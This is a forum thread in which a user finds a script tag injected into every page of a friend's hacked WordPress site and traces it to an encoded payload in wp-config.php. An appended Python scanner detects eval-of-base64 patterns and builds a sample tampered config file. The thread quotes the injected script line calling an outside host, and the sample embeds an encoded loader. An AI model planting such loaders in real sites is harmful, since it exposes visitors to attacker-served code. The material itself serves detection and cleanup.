jsarber, posted April 23, 2010:

My friend, The Lonely Conservative (lonelyconservative.com), had her site hacked. I am struggling to find the problem code within her WordPress site. Here's what's going on. This script has been added to the bottom of each page:

    <script src="http://61.4.82.212/js.php"></script>

As you would expect, this script is not within the actual files. I assume I am looking for some kind of encoded something or other. How in the world do I go about finding it? I've been searching for more than a day.

falkencreative, posted April 23, 2010:

Just double checking... you've checked the bottom of your index.php file? (in the root of your site -- not within your theme folder) And the footer.php file within your theme folder? It looks like it's included on every page, so those are the two logical places it would be. It won't necessarily be encoded -- this has happened to me in the past and it was just plain text.

krillz, posted April 23, 2010:

Sounds like an XSS attack; start by looking at user-submitted data.

jsarber (thread author), posted April 23, 2010:

Here's the root index file:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */

    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>

Here's the theme's footer:

    <?php global $wp_theme_options; ?>
    <?php do_action('above_footer') ?>
    </div><!--end #container-->
    <div class="<?php do_action('container_style'); ?>" id="footer">
        <div class="alignleft">
            <strong><?php bloginfo('name'); ?></strong><br />
            <?php _e('Copyright ©','flexx'); echo ' '.date('Y').' '; _e('All Rights Reserved','flexx'); ?>
        </div>
        <div class="alignright">
            <?php
            $footer_credit = '<a href="http://flexxtheme.com/" title="Flexx Theme">'.__('Flexx Theme','flexx').'</a> '.__('by','flexx').' <a href="http://ithemes.com" title="WordPress Themes">iThemes</a><br />';
            $footer_credit .= __('Powered by','flexx').' <a href="http://wordpress.org">'.__('WordPress','flexx').'</a>';
            echo apply_filters('ithemes_footer_credit',$footer_credit);
            ?>
        </div>
        <?php wp_footer(); //We need this for plugins ?>
    </div>
    <?php do_action('flexx_footer_stats'); ?>
    </body>
    </html>

I don't see anything, do you? I've searched the entire site for that script and every part of it. My search was fruitless which made me think it must be encoded. I also searched the database and came up short. I don't know what to do.

jsarber (thread author), posted April 23, 2010:

I got it. It was some encoded script added to the wp-config file in the root directory by some hacker. I simply replaced the file, changed the passwords, and all is well.

falkencreative, posted April 23, 2010:

Cool, glad you got that fixed.

newseed, posted April 23, 2010:

As a security measure, be sure to set your wp-config.php file to be unwritable via your hosting control panel.

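
A plain-text search missed the injection in this thread because the script was stored encoded in wp-config.php. The scanner below is an added example, not code from any poster: it decodes string literals before searching for the injected URL and also reports files left writable. It assumes base64 encoding (the thread does not say which encoding was used); the function names, sample files and the 192.0.2.10 address are constructed for illustration.

```python
import base64, os, pathlib, re, stat, tempfile
# Assumption: the payload is a base64 literal passed to eval(); the thread only says "encoded".
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{24,}={0,2})["']""")
DECODER_CALL = re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def decoded_literals(source):
    """Yield the decoded text of every base64-looking string literal."""
    for match in B64_LITERAL.finditer(source):
        blob = match.group(1)
        try:
            yield base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("latin-1")
        except ValueError:  # not valid base64 after all
            continue

def scan_file(path, indicator):
    """Return the list of findings for one PHP file."""
    source = pathlib.Path(path).read_text(encoding="latin-1")
    checks = [
        ("indicator in plain text", indicator in source),
        ("indicator inside base64 literal", any(indicator in t for t in decoded_literals(source))),
        ("eval of decoded data", bool(DECODER_CALL.search(source))),
        ("writable by group or other", bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))),
    ]
    return [label for label, hit in checks if hit]

def scan_tree(root, indicator):
    """Map each flagged .php file under root to its findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in (f for f in files if f.endswith(".php")):
            path = os.path.join(folder, name)
            if found := scan_file(path, indicator):
                report[os.path.relpath(path, root)] = found
    return report

def build_sample(root):
    """Constructed sample site (TEST-NET address): clean index.php, tampered wp-config.php."""
    payload = base64.b64encode(b'echo \'<script src="http://192.0.2.10/js.php"></script>\';').decode()
    files = {"index.php": ("<?php require('./wp-blog-header.php'); ?>\n", 0o644),
             "wp-config.php": ("<?php define('DB_NAME', 'wp');\neval(base64_decode('%s'));\n" % payload, 0o666)}
    for name, (body, mode) in files.items():
        target = pathlib.Path(root, name)
        target.write_text(body)
        target.chmod(mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample(site)
        print(scan_tree(site, "192.0.2.10/js.php"))
```

A payload hidden with an encoding other than base64 will not produce the indicator match; it shows up only through the "eval of decoded data" finding.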